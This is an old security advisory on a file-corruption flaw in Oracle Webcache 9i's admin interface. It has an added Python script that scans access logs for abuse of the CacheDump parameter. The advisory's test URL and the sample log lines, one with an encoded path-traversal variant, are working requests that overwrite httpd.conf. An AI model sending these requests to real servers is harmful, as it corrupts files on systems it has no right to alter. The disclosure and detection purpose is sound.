Append file in Oracle Webcache 9i
Name | Append file in Oracle Webcache 9i
Systems Affected | Oracle Application Server with Webcache 9i
Severity | Medium Risk
Category | Corruption of files
Vendor URL | http://www.oracle.com/
Author | Alexander Kornbrust (ak at red-database-security.com)
Date | 11 May 2005 (V 1.02)
CAN-Number | CAN-2005-1382
Details
It is possible to corrupt any file of an Oracle Application Server installation by appending garbage to the file (e.g. httpd.conf).
This issue can be combined with cross-site scripting vulnerabilities in the webcache administrator application.
Patch Information
Oracle fixed this issue with informing me or their customers.
Testcase
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&
index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf
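
Added example, not part of the original advisory: a log check that flags webcacheadmin requests with SCREEN_ID=CGA.CacheDump whose cache_dump_file parameter points outside an expected dump directory. It assumes the admin port's requests are logged in Common Log Format; ALLOWED_DUMP_DIR, the function names and the sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: hypothetical directory that administrators legitimately dump to.
ALLOWED_DUMP_DIR = "/var/tmp/webcache-dumps"

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_dump_target(request_target):
    """Return the normalised dump path if it lies outside ALLOWED_DUMP_DIR, else None."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/webcacheadmin"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if "CGA.CacheDump" not in params.get("SCREEN_ID", []):
        return None
    for raw in params.get("cache_dump_file", []):
        # Normalise first so "../" segments cannot disguise the real target.
        path = posixpath.normpath(raw)
        if not path.startswith(ALLOWED_DUMP_DIR + "/"):
            return path
    return None

def scan(log_lines):
    """Return (line_number, dump_path) for every flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            target = suspicious_dump_target(match.group(1))
            if target is not None:
                hits.append((number, target))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - admin [11/May/2005:10:00:01 +0200] "GET /webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/var/tmp/webcache-dumps/dump1.txt HTTP/1.1" 200 512',
    '10.0.0.9 - admin [11/May/2005:10:02:13 +0200] "GET /webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf HTTP/1.1" 200 498',
    '10.0.0.9 - admin [11/May/2005:10:02:40 +0200] "GET /webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/var/tmp/webcache-dumps/..%2F..%2F..%2Fopt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf HTTP/1.1" 200 498',
    '10.0.0.7 - - [11/May/2005:10:03:00 +0200] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: CacheDump written to {path}")
```

Parameters sent in a POST body do not appear in an access log, so this check only covers requests that carry the parameters in the URL.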
History
23-sep-2003 Oracle secalert was informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory
11-may-2005 CAN added
© 2005 by Red-Database-Security GmbH - last update 03-nov-2005
Oracle Webcache
Oracle Webcache is part of the Oracle Application Server (aka OAS, aka IAS).
The Oracle Web Cache can be used to cache static and dynamically generated web pages. The cache should be your first point for accepting user requests from clients using web browsers.
The Web Cache also provides load balancing and can route non-cached requests to a set of web servers. This provides protection when some of the servers are overloaded or become inaccessible.